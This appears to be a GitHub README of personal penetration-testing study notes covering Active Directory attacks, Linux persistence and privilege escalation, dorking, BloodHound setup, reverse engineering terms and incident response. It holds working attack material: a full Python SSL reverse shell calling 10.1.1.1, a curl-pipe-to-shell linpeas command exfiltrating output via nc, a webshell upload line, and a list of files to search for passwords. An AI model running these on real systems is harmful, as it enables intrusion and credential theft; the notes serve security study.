Attacking Active Directory

Use Kerbrute to Identify usernames associated with active directory domain.

Use Smb Client to enumerate SMB ports 139/445 using crackmapexec, smbclient and smbmap

Use Crackmap to determine access to shares Dont forget to use modules . module -M spider_plus

If access is gained to a user account Rubeus can be used to harvest and bruteforce tickets.

Impacket can also be used to kerbroast using getuserspn.py (this file is located in the /examples folder in impacket)

Source: https://safe.menlosecurity.com/https://pentest.coffee/active-directory-cheat-sheet-94e0bb9bed2

Persistence

Backdooring the SSH Add an ssh key into the ~/.ssh folder.

ssh-keygen write the content of ~/.ssh/id_rsa.pub into ~/.ssh/authorized_keys set the right permission, 700 for ~/.ssh and 600 for authorized_keys

chmod u+s could be used by a higher level user to grant an arbitrary command or file higher privleges. Then

cronjob

image

To create a new cron job, run the following command in the terminal which edits the crontab file:

crontab -e

You can stop a single cron job by removing its line from the crontab file. To do that, run the crontab -e command and then delete the line for the specific task. Alternatively, you can stop the cron job by commenting it out in the crontab file. example: 44 3 * * * echo "hello world" > hello.txt
In our example, the value for minute is 44, and the value for hour is 3. The * sign means always. Using the * value for the day field means every day, and using the * value for the month field means every month. Setting the value for weekday to * means the job will run every day from Sunday to Saturday.
The sixth field provides the actual job or command to be executed at the scheduled time. In the case of our example, the command is echo "hello world" > hello.txt.

cat /etc/crontab

Linpeas

Excute from memory and send output back to the host

nc -lvnp 9002 | tee linpeas.out #Host curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim

If you have a firmware and you want to analyze it with linpeas to search for passwords or bad configured permissions you have 2 main options.

If you can emulate the firmware, just run linpeas inside of it: cp /path/to/linpeas.sh /mnt/linpeas.sh chroot /mnt #Supposing you have mounted the firmware FS in /mnt bash /linpeas.sh -o software_information,interesting_files,api_keys_regex If you cannot emulate the firmware, use the -f </path/to/folder param:

Point to the folder containing the files you want to analyze

bash /path/to/linpeas.sh -f /path/to/folder

linux file permissions

-rw-r--r-- 12 linuxize users 12.0K Apr  8 20:51 filename.txt
|[-][-][-]-   [------] [---]
| |  |  | |      |       |
| |  |  | |      |       +-----------> 7. Group
| |  |  | |      +-------------------> 6. Owner
| |  |  | +--------------------------> 5. Alternate Access Method
| |  |  +----------------------------> 4. Others Permissions
| |  +-------------------------------> 3. Group Permissions
| +----------------------------------> 2. Owner Permissions
+------------------------------------> 1. File Type

https://linuxize.com/post/chmod-command-in-linux/

Getting Processes/Services to Start on Boot

Some applications can be started on the boot of the system that we own. For example, web servers, database servers or file transfer servers. This software is often critical and is often told to start during the boot-up of the system by administrators.

Enter the use of systemctl -- this command allows us to interact with the systemd process/daemon. Continuing on with our example, systemctl is an easy to use command that takes the following formatting: systemctl [option] [service]

Start
Stop
Enable
Disable

Here we're running echo "Hi THM" , where we expect the output to be returned to us like it is at the start. But after adding the & operator to the command, we're instead just given the ID of the echo process rather than the actual output -- as it is running in the background.

Access Permission Testing

Check the access permissions of your users and in case your web application provides role-based access, then ensure users are getting access only to those parts of the web application to which they have the right. Nothing more or less.

User Session Testing This is very important. Ensure that user sessions end upon log off. Because if they don’t, that valid session can be easily hijacked by hackers – this process is known as session hijacking – for carrying out malicious activity.

Brute Force Attack Testing Using appropriate testing tools, ensure your web application stays safe against brute force attacks.

DoS (Denial of Service) Attack Testing Also ensure your web application stays safe against DoS (Denial of Service) attacks by using appropriate testing tools.

Directory Browsing Ensure directory browsing is disabled on the web server which hosts your web application. Because if you don’t, you’ll be giving hackers easy access to your restricted files.

Upgrade shell

python -c 'import pty;pty.spawn("/bin/bash")'

Web app tactics

Add an additional URL as a get parameter in a website
	Http://example.com/?destination=https://google.com
	Source - https://www.youtube.com/watch?v=jwBRgaIRdgs

“<!--” denotes the beginning of a comment in an html page 

Inputting link to a user field 
	To input mallicuous link into prompt 
<a href="url">link text</a>

Iphone Hacking

jailbreaking 
	palera1n - https://palera.in/ - need to use actual lighning to usb cable. 




	frida 

Reverse engineering

ghidra - https://www.youtube.com/watch?v=d4Pgi5XML8E

In reverse engineering, particularly when analyzing assembly code, you come across a variety of instructions, directives, and codes. Here’s a categorized list of commonly encountered terms and instructions across different architectures (like x86, ARM, MIPS, etc.):

General Assembly Instructions Data Transfer

mov (move data) lea (load effective address) ldr (load register, ARM) str (store register, ARM) ld / st (load/store, RISC architectures) Arithmetic Operations

add, sub (addition, subtraction) mul, imul (multiplication) div, idiv (division) inc, dec (increment, decrement) Bitwise Operations

and, or, xor (bitwise AND, OR, XOR) not (bitwise NOT) shl, shr (shift left, shift right) rol, ror (rotate left, rotate right) Control Flow

jmp (jump) call (function call) ret (return from function) je, jne (jump if equal/not equal) jg, jge, jl, jle (jump based on comparison) Stack Operations

push, pop (push to/pop from stack) call, ret (function call/return) leave (clean up the stack frame) Comparison

cmp (compare) test (bitwise test) Floating-Point Operations

fld, fst (load/store floating-point value) fadd, fsub, fmul, fdiv (floating-point arithmetic) ARM-Specific Instructions Branch Instructions

b (branch) bl (branch with link, i.e., function call) bx (branch to address in register) blx (branch with link and exchange) Load and Store

ldr, str (load/store) ldrb, strb (load/store byte) ldrh, strh (load/store halfword) Condition Codes

eq, ne, gt, lt, ge, le (equal, not equal, etc.) Appended to instructions: moveq, addne, etc. Special Operations

svc (supervisor call, ARM syscall) mrs, msr (move to/from system registers) MIPS-Specific Instructions Load/Store

lw (load word) sw (store word) lb, sb (load/store byte) Arithmetic

add, sub mult, div Branching

beq (branch if equal) bne (branch if not equal) j, jal (jump, jump and link) Logical

and, or, xor, nor Control Flow and References Cross-References

xref (cross-reference in tools like IDA Pro, Ghidra) jmpl (jump and link) Directives

.data, .text (section markers) .globl (global symbol) .align (memory alignment) System Instructions

syscall (system call in x86) int 0x80 (Linux system call interrupt) hlt (halt the CPU) Exception and Interrupts

int (interrupt) iret (interrupt return) Pseudocode Constructs in Tools Reverse engineering tools like IDA Pro or Ghidra abstract low-level assembly into higher-level pseudocode. Common constructs include:

CALL (function calls) IF, ELSE, WHILE, FOR (control structures) Variable references (e.g., var_4, local_8) Miscellaneous NOP (No Operation)

nop (used for alignment or delay) Flags and Conditions

Instructions affecting flags: add, sub, cmp, etc. Conditional jumps depend on flags (e.g., Zero, Carry, Overflow). Debugging and Markers

trap (debugging breakpoint) db, dw, dd (define byte, word, doubleword) This list covers a wide spectrum of instructions and references used in reverse engineering across different architectures. Tools like Ghidra, IDA Pro, or Binary Ninja often add their own abstractions to make analysis easier. If you're working on a specific architecture, focusing on its instruction set will be most beneficial.

In the context of reverse engineering software, an array is a data structure that stores a collection of elements (usually of the same type) in contiguous memory locations. Arrays are common in programming, and reverse engineers encounter them frequently while analyzing compiled binaries or source code. Understanding arrays in this context is crucial for tasks such as debugging, decompilation, and understanding program behavior.

Characteristics of Arrays in Reverse Engineering: Contiguous Memory: Arrays are stored in a block of contiguous memory, which means the elements are laid out sequentially. This property helps reverse engineers identify arrays in memory dumps or disassembled code.

Indexing: Each element in an array is accessible by its index, which is often a fixed offset from the base address of the array. In assembly, this is frequently observed as pointer arithmetic or index-based access.

Size: Arrays have a fixed size in memory, determined at compile time or runtime. The size can sometimes be inferred from the surrounding code or data structure definitions.

Type Information: In statically typed languages, all elements in an array are of the same data type. Reverse engineers use this to deduce data types based on the operations performed on the array elements.

Common Uses: Arrays in software can hold:

Data structures (e.g., strings, buffers). Tables or lookup data (e.g., encryption keys, color palettes). Runtime variables like stacks or matrices. Indicators of Arrays in Disassembled Code: Sequential Access:

Look for loops that iterate over contiguous memory. Instructions like MOV, ADD, SUB, or LEA that access memory locations sequentially often point to array usage. Pointer Arithmetic:

Code performing arithmetic on pointers (e.g., base_address + index * element_size) suggests array indexing. Initialization Patterns:

Recognizable patterns of initializing memory with regular offsets often imply an array. Debug Symbols:

In some binaries, debug symbols or metadata can provide direct information about array structures. Strings:

Null-terminated character arrays (char[]) are common for strings, identifiable by their null byte (0x00) terminator. Challenges in Reverse Engineering Arrays: Dynamic Allocation: Arrays allocated dynamically (e.g., using malloc or new) are harder to identify without detailed analysis of the heap. Unknown Types: If type information is stripped from the binary, reverse engineers must deduce types through usage patterns. Multidimensional Arrays: These add complexity, as they involve nested indexing. Understanding arrays and their behavior in a program is often a crucial step in reverse engineering, as they frequently hold critical data or contribute to the functionality of the software being analyzed.

You said: can you give me some more vocabulary words relevant to software reverese engineering and their deffinitions ChatGPT said: ChatGPT Here is a list of vocabulary words commonly used in software reverse engineering along with their definitions:

General Terms: Disassembler

A tool that converts machine code into assembly language, enabling reverse engineers to analyze executable binaries. Decompiler

A tool that attempts to reconstruct high-level source code (e.g., C, C++) from compiled binaries. Debugger

A tool that allows the user to execute a program step-by-step, inspect memory, and analyze its runtime behavior. Binary

A compiled, machine-readable version of a program. Instruction Set Architecture (ISA)

A specification of the set of operations, instructions, and formats supported by a processor (e.g., x86, ARM). Opcode

The part of a machine code instruction that specifies the operation to be performed. Dynamic Analysis

The process of analyzing a program's behavior during execution. Static Analysis

Analyzing a program without executing it, usually through disassembly or decompilation. Control Flow Graph (CFG)

A representation of all possible paths of execution through a program. Intermediate Representation (IR)

A simplified, lower-level representation of code used in reverse engineering and compiler design for easier analysis. Memory and Data: Stack

A memory structure used for managing function calls and local variables. Grows and shrinks during program execution. Heap

A region of memory used for dynamic allocation during runtime. Registers

Small, fast storage locations within a CPU that hold data or addresses being used during execution. Pointer

A variable that holds a memory address, commonly used for referencing data in arrays, structures, or functions. Buffer Overflow

A software vulnerability where data exceeds a buffer's boundary, potentially allowing execution of arbitrary code. Code Behavior: Function Prologue/Epilogue

The setup and cleanup instructions executed at the beginning and end of a function, respectively. Hooking

Intercepting function calls, messages, or events to alter or monitor a program's behavior. Obfuscation

Techniques used to make code harder to understand or reverse-engineer, such as renaming variables to meaningless names or inserting junk instructions. Packing

Compressing and/or encrypting an executable to hide its true contents and behavior. Shellcode

A small piece of code used as a payload in exploits, often written in assembly and designed for execution in vulnerable software. Sandboxing

Running a program in a restricted environment to analyze its behavior safely, often used for malware analysis. Inline Assembly

Assembly instructions written directly within high-level source code. Tools and Techniques: Hex Editor

A tool for examining and editing the raw binary contents of a file. Signature

A pattern or sequence used to identify functions, libraries, or malicious code. Breakpoint

A deliberate pause in program execution during debugging, used to inspect the state of the program. Fuzzing

An automated technique for finding vulnerabilities by providing unexpected or random inputs to a program. Symbol Table

A data structure used in binaries to map variable and function names to their addresses. Security and Malware: Ransomware

Malicious software that encrypts files and demands payment for their decryption. Trojan Horse

Malicious software disguised as legitimate to trick users into installing or executing it. Reverse Shell

A connection initiated by a compromised machine to a remote attacker, giving them control over the system. Polymorphic Code

Code that changes its structure each time it runs to evade detection, commonly seen in malware. Anti-Reverse Engineering

Techniques used to detect and thwart reverse engineering efforts, such as debugger detection or encrypted code. Exploit

A piece of software or code that takes advantage of a vulnerability to perform unintended or malicious actions. Concepts and Representations: Relocation Table

A section in a binary that allows the program loader to adjust memory addresses used by the executable. Symbolic Execution

Analyzing a program by following symbolic rather than concrete values to explore multiple execution paths. Endianness

The order in which bytes are arranged in memory, such as little-endian or big-endian. Instruction Pipeline

A mechanism in CPUs that allows multiple instructions to be processed simultaneously at different stages of execution. Thunk

A small piece of code that redirects execution, often used for function interposition or lazy loading. Dead Code

Instructions or code segments that are never executed but might be used to confuse reverse engineers.

Nmap

Nmap only supports ethernet interfaces (including most 802.11 wireless cards and many VPN clients) for raw packet scans. Unless you use the -sT -Pn options, RAS connections (such as PPP dialups) and certain VPN clients are not supported. This support was dropped when Microsoft removed raw TCP/IP socket support in Windows XP SP2. Now Nmap must send lower-level ethernet frames instead.

VPN issues

https://nmap.org/book/inst-windows.html

Dorking

cache:[url] Shows the version of the web page from the search engine’s cache.
related:[url] Finds web pages that are similar to the specified web page.
info:[url] Presents some information that Google has about a web page, including similar pages, the cached version of the page, and sites linking to the page.
site:[url] Finds pages only within a particular domain and all its subdomains.
intitle:[text] or allintitle:[text] Finds pages that include a specific keyword as part of the indexed title tag. You must include a space between the colon and the query for the operator to work in Bing.
allinurl:[text] Finds pages that include a specific keyword as part of their indexed URLs.
meta:[text] Finds pages that contain the specific keyword in the meta tags.
filetype:[file extension] Searches for specific file types.
intext:[text], allintext:[text], inbody:[text] Searches text of page. For Bing and Yahoo the query is inbody:[text]. For DuckDuckGo the query is intext:[text]. For Google either intext:[text] or allintext:[text] can be used.
inanchor:[text] Search link anchor text
location:[iso code] or loc:[iso code], region:[region code] Search for specific region. For Bing use location:[iso code] or loc:[iso code] and for DuckDuckGo use region:[iso code].An iso location code is a short code for a country for example, Egypt is eg and USA is us. https://en.wikipedia.org/wiki/ISO_3166-1
contains:[text] Identifies sites that contain links to filetypes specified (i.e. contains:pdf)
altloc:[iso code] Searches for location in addition to one specified by language of site (i.e. pt-us or en-us)
feed:[feed type, i.e. rss] Find RSS feed related to search term
hasfeed:[url] Finds webpages that contain both the term or terms for which you are querying and one or more RSS or Atom feeds.
ip:[ip address] Find sites hosted by a specific ip address
language:[language code] Returns websites that match the search term in a specified language
book:[title] Searches for book titles related to keywords
maps:[location] Searches for maps related to keywords
linkfromdomain:[url] Shows websites whose links are mentioned in the specified url (with errors)
https://securitytrails.com/blog/google-hacking-techniques

Linux Privesc

Use linpeas to identify avenues to escelate privleges privileges in linux. Linpeas must be served to the victim machine on a python3 http server or similar. To force victims to pull linpeas from your attacking machine use Wget. Example: wget 10.6.114.53:9999/linpeas.sh. The previous command pulls the “linpeas.sh” file from the hosting server. 

* GTFOBins
GTFOBINs is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems. The project collects legitimate functions of Unix binaries that can be abused to get the f**k break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.


Find the SUID files
The following command will list all of the SUID files in the system
find / -perm -u=s -type f 2>/dev/null

Find Processes running as root 
ps aux | grep root 

See logged in users
ps au

Can the user run anything as another user?
sudo -l

Check for unmounted file systems/drives
`lsblk`


source: https://safe.menlosecurity.com/https://pentest.coffee/linux-privilege-escalation-for-oscp-and-beyond-cheat-sheet-24fb9fe13058

list of config files, logfiles that could contain cleartext passwords

System Configuration Files

/etc/passwd: Historically used for storing passwords, though modern systems use it for account information and store hashed passwords in /etc/shadow.
/etc/shadow: Stores password hashes, but misconfigurations or weak hashing can lead to vulnerabilities.
/etc/group: Similar to /etc/passwd, but for group information.
/etc/gshadow: Group password hashes, similar to /etc/shadow.

Application and Service Configuration Files

Web Server Config Files: Files like Apache's httpd.conf or Nginx's nginx.conf and associated site configuration files.
Database Config Files: Such as MySQL's my.cnf, PostgreSQL's pg_hba.conf, or similar files for other database systems.
Application-specific Config Files: Files like config.php (for PHP apps), settings.py (for Django apps), .env files, or other application configuration files.
FTP and SSH Config Files: Files like vsftpd.conf for vsFTPd or SSH daemon config files (sshd_config) might contain passwords for certain configurations.
VPN Config Files: For instance, OpenVPN configuration files (openvpn.conf) might include credentials.

User Home Directories

Shell Configuration and History Files: Files like .bashrc, .bash_history, .zshrc, .zsh_history, etc., may contain inadvertently stored passwords or sensitive commands.
.netrc: Used by FTP and other network clients to store credentials.
SSH Keys: Not clear-text passwords, but files like id_rsa in .ssh can be critical.

System and Application Log Files

Web Server Logs: (/var/log/apache2/access.log, /var/log/nginx/access.log, etc.) might inadvertently contain credentials passed through URLs or in POST requests.
Database Logs: SQL query logs could contain plain text credentials, especially in verbose logging modes.
Application Logs: Depending on the application, logs (/var/log/app_name/) might include sensitive information.
System Logs: (/var/log/syslog, /var/log/auth.log) can sometimes contain sensitive information, depending on the system activities and log configuration.

Miscellaneous Files

Cron Job Files: (/etc/crontab, /var/spool/cron/crontabs/) might contain scripts with embedded credentials.
Backup Files: Such as .bak, .old, files containing previous versions of configuration files.
.git Configuration Files: Repositories with configuration files or code that might contain hard-coded credentials.

Additional Places

.git Configuration: Repositories with stored credentials in configuration or code files.
Backup Files: Such as .bak, .old, .tmp, which might contain older versions of config files with passwords.
SSH Keys and Configurations: While not clear-text passwords, private SSH keys (id_rsa) are often equivalent to passwords and should be secured similarly.

Mac OS

Look into /var/logs/ 

STEALTH

/dev/shm

Use the directory /dev/shm to work out of to avoid writing files to the disk. This is a virtual directory that only exists in memory. Any files left behind here will be wiped when the system shuts down or restarts.

Questions:

Change stolen ssh keys to read only?

MISC

Windows stores its host file (equivilent to /etc/hosts) in the C:\Windows\System32\drives\etc\hosts.

PAssword Cracking

Basic Usage

WELCOME TO SETTING UP BLOODHOUND ENVIRONMENT**

The purpose of this is to enumerate the enviornment without needing to "own" a domained joined device within the network for an internal assessment.

Dependencies

  1. Neo4j

  2. Bloodhound

3.impacket

4.ldap3

5.dnspython

Bloodhound-Python

  1. domain login credentials

  2. Visiability towards a Domain Controller

Neo4j - package will come included with Kali OVA distros as well as the Kali ISO.

If not - https://installati.one/kalilinux/neo4j/


	Run the following command:

		sudo apt-get update

		sudo apt-get -y install neo4j


		OR

		sudo apt update

		sudo apt -y install neo4j


After installation is complete


	Run the following command:

		sudo neo4j console - this will start up the neo4j database locally on your host.


	Navigate towards http://localhost:7474/

		use default login of neo4j//neo4j - this will ask you to change your password. Feel free to change to whatever you would like to.

	

	Finally leave the instance runnning within a terminal tab.

Bloodhound - this tool will come included within Kali OVA distros as well as the Kali ISO

If not - https://www.kali.org/tools/bloodhound/

	Run the following command:

		sudo apt install bloodhound


After installation is complete

	Run bloodhound - a GUI window will appear for you within a login screen. Use your neo4j credentials you have changed earlier above in the neo4j setup.

Bloodhound-Python - This tool will NOT come included within Kali. You will have to navigate towards https://github.com/fox-it/BloodHound.py

Installation - Read the README.md carefully.

	BloodHound.py requires - impacket, ldap3, dnspython

	This can be done with:

		sudo pip3 install bloodhound - this will install all requirements


After installation you will need to have domain credentials already owned, be already interally in the network, and be able to "see" a domain controller. 


If all pre-reqs are met run the following command.

	

	bloodhound-python -u <user> -p <password> -dc <domain controller> -disable-autogc -d <domain>

		

		Feel free to add '-c all' to the end of the command if you wish to use more than just LDAP to gather more information about the domain. 	


		This will create all json files within your current working directory.

Finally navigate back towards your Bloodhound GUI.

Go to "Upload Data" button on the right hand side.


	Navigate towards your json files that bloodhound-python created and click "Open".


	Allow Bloodhound to process your json files.


Once all json files have been processed you should be able to run the pre-built queries to see a nice visual view of the environment. 

Crackmap exec

Powersploit

Incognito - token impersonation

Azure

Webshells

Cmd.aspx is a webshell. Reference htb box revel.

put /usr/share/webshells/aspx/cmdasp.aspx c.aspx

SSL reverse shell python

import os
import socket
import subprocess
import ssl
 
# Create a socket
def socket_create():
    try:
        global host
        global port
        global ssls
        global s
        host = '10.1.1.1'
        port = 8443
        s = socket.socket()
        ssls = ssl.wrap_socket(
            s, 
            ssl_version=ssl.PROTOCOL_TLSv1
            )
    except socket.error as msg:
        print('Socket creation error: ' + str(msg))
 
# Connect to a remote socket
def socket_connect():
    try:
        ssls.connect((host, port))
        ssls.send(str.encode(str(os.getcwd()) + ' > '))
    except socket.error as msg:
        print('Socket connection error: ' + str(msg))
 
# Receive commands from remote server and run on local machine
def receive_commands():
    while True:
        data = ssls.recv(1024)
        data = data.decode("utf-8").strip()
        print('Received: ' + data)
        if data[:2] == 'cd':
            os.chdir(data[3:])
            ssls.send(str.encode(str(os.getcwd()) + ' > '))
        elif len(data) > 0:
            cmd = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            output_bytes = cmd.stdout.read() + cmd.stderr.read()
            output_str = str(output_bytes.decode("utf-8"))
            ssls.send(str.encode(output_str + str(os.getcwd()) + ' > '))
            if len(output_str.split('\n')) > 2:
                nL = 2
            else:
                nL = 0
            print('Sent: ' + nL * '\n' + output_str)
        if not data:
            break
    s.close()
 
def main():
    socket_create()
    socket_connect()
    receive_commands()
 
if __name__ == '__main__':
    main() 

CODING

C

Variables - numbers, characters, text, decimal numbers, etc. int = integer just type out the number. no decimals double = decimal number float = decimal char = one single character in quotes example 'A'. to create a string of characters use []

Store characters use char. Examle usage of char - char variablename = G To use store multiple characters in one char variable, like a name use [] char variablename [] = "lewis";

To Store whole number(integers) use int Example - int samplenumber = 35;

Variables can be invoked using the percent sign % followed by the letter that corresponds to the type of data you are trying to represent.

Example:

int main () { char variablename [] = "lewis"; int samplenumber = 35; printf (%s is a man. \n" , variablename) ; printf ( "lewis is %d years old. \n , samplenumber) ; return 0; }

Method - is a container where you can put code. ";" - end of instruction "\n" - new line "" - is to escape characters. for instance if you wanted to print a special cahracter. use this to escape it. Example of printf function. printf ("There once was a man named george \n");

Red Teaming

sample attack chain
	Initial access through phishing
	Kerbroast
 		DCsync 
   		Dump registry 
 	_________________________
	Gain access - Initial access, Defense evasion, C2E
 		Establish foothold - Persistence, Discovery 
   		Obtain Privs - Credential access, privesc, lateral movement 

Defense evasion

	Process injection / Process hollowing 
        	Freeze framework 

Living off the land

Tpmtool - Tool can be used 

Batch files for redteaming

ProcMon -https://gist.github.com/egre55/1df7db9c13648097f997432019f4a8e1

pivoting, latteral movemnt

chisel - https://www.youtube.com/watch?v=pbR_BNSOaMk

Golden Image testing

Attacking and Defending AWS, Azure and GCP Apps + Kubernetes + Docker

image

Incident Response

#Preperation 
Policy Development
Plan Creation
Team Formation
Tools and Resources
Training
Legal and Compliance Review
Integration with Business Continuity

#Detection
Monitoring
Detection Engineering
Threat Hunting
Threat Intelligence
Anomaly Detection
Security Assessmen

#Triage
Severity Assessment
Incident Categorization
Escalation
Stakeholder Communication
Resource Allocation

#Containment 
Network Isolation
Logical Access Isolation
Forensics Automation
Communication with Affected Parties
Patch Management
Resource Disablement

#Analysis
Data Collection
Forensic Analysis
Log Analysis
Root Cause Analysis
Timeline Reconstruction
Security Posture Assessment

#Remediation 
Patch Management
Credential Reset
Threat Eradication
Configuration Changes
Security Enhancements
Hardening
Documentation

# Recovery
# Post-Incident Activty

Incident response is a structured approach used to manage and address security breaches, cyberattacks, or other threats to an organization’s systems and data. The goal is to effectively manage the situation to minimize damage, reduce recovery time, and mitigate any future risk. The incident response process generally follows a cycle of well-defined principles and stages.

  1. Preparation Preparation is the first principle and is critical to ensuring that an organization can handle security incidents effectively. The better prepared you are, the quicker you can respond. This includes:

Developing an Incident Response Plan: A documented procedure detailing how incidents will be identified, reported, and managed. Establishing a Response Team: A dedicated team trained to handle security incidents (usually called the Computer Security Incident Response Team, or CSIRT). Training: Regularly training staff on security policies and awareness. Tools and Resources: Ensuring the right tools (e.g., detection systems, logging tools) and resources are in place. 2. Identification In this phase, the goal is to detect and accurately determine whether an incident has occurred. Identification involves:

Monitoring Systems: Continuously monitoring network traffic, endpoints, and logs to identify suspicious activities. Initial Assessment: Once a potential incident is identified, it must be assessed to confirm whether it is an actual security incident. Classifying the Incident: Determining the type, severity, and impact of the incident. This helps prioritize how the response should proceed. 3. Containment Once an incident is identified, the first priority is to contain it to prevent further damage. Containment can be split into two phases:

Short-term Containment: Implementing measures to stop the spread or impact of the attack. This could involve isolating compromised systems, closing off certain network segments, or disabling user accounts. Long-term Containment: Ensuring that affected systems are securely restored. This could involve applying security patches, making system backups, or preparing for full system recovery while preserving forensic evidence. 4. Eradication After containment, the next step is to remove the root cause of the incident. Eradication involves:

Eliminating the Threat: Removing malware, cleaning up infected systems, and closing exploited vulnerabilities. Verification: Ensuring that the threat has been fully removed, by scanning systems and reviewing logs to check for any remaining traces of the attacker or malware. 5. Recovery Once the incident has been contained and eradicated, it’s time to restore and validate the systems affected. The recovery phase includes:

Restoring Systems: Bringing systems back online safely, ensuring they are clean and secure. Testing: Verifying that systems are functioning normally and that there are no signs of reinfection or vulnerabilities. Monitoring: Closely monitoring systems to detect any abnormal behavior or potential follow-up attacks after recovery. 6. Lessons Learned After the incident has been resolved, it’s essential to review what happened, how it was handled, and how the organization can improve its defenses in the future. This phase involves:

Post-Incident Review: Conducting a meeting with the incident response team and stakeholders to go over what happened, what worked well, and what didn’t. Documenting the Incident: Writing an incident report that details the incident, including timelines, actions taken, and lessons learned. Improving the Incident Response Plan: Updating policies, procedures, and security controls based on the incident review to improve future responses. Key Principles of Incident Response: Speed and Efficiency: Respond as quickly as possible to minimize damage and disruption. Containment over Eradication: Contain first to prevent the spread of damage, then focus on eliminating the threat. Documentation: Document everything throughout the process to maintain a clear record for analysis and potential legal or compliance requirements. Communication: Clear, consistent communication between the incident response team, stakeholders, and external parties (e.g., legal teams or law enforcement). Continuous Improvement: Every incident should provide insights to improve future incident response strategies and reduce vulnerabilities.

image image image

Common Cloud Attack Approach

Adversary gains foothold into the Account through compromised credentials User credentials => AWS Access Key and Secret Key Service Tokens => AWS Access Key, Secret Key and Session Token Leverages credentials to escalate privileges Performs one or more techniques, depending on objective, configuration and so on

image

image

Kubernetes + Docker

image

How to develop persistence in AWS and other cloud platforms ?

Dockerscan is a tool that can be used to reverse shell using docker. Docker uses LD preload to add commands to the docker image LDpreload being present means that your docker image may be compromised. LD preload is an additional instruction that can be used to make an image execute a process. in this case a rev shell.

https://github.com/aquasecurity/trivy - Trivy (pronunciation) is a comprehensive and versatile security scanner. Trivy has scanners that look for security issues, and targets where it can find those issues.

Targets (what Trivy can scan):

Container Image Filesystem Git Repository (remote) Virtual Machine Image Kubernetes AWS

Kubernetes forensics

kubeshark hubble

7-October-24 class Questions:

Layered file system? Union mounting

Phones

IOS

unzip ipa - app.ipa -d app 

Android

Fun Facts

  • Aws WAFs in affition to may other wafs based on modsecurity waf only inspects 8kb of data per payload
  • Microsoft teams installs its application files in the users local profile folder - %LocalAppData%\Microsoft\Teams directory within each user's profile. This per-user installation approach allows Teams to update itself without requiring administrative privileges.

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published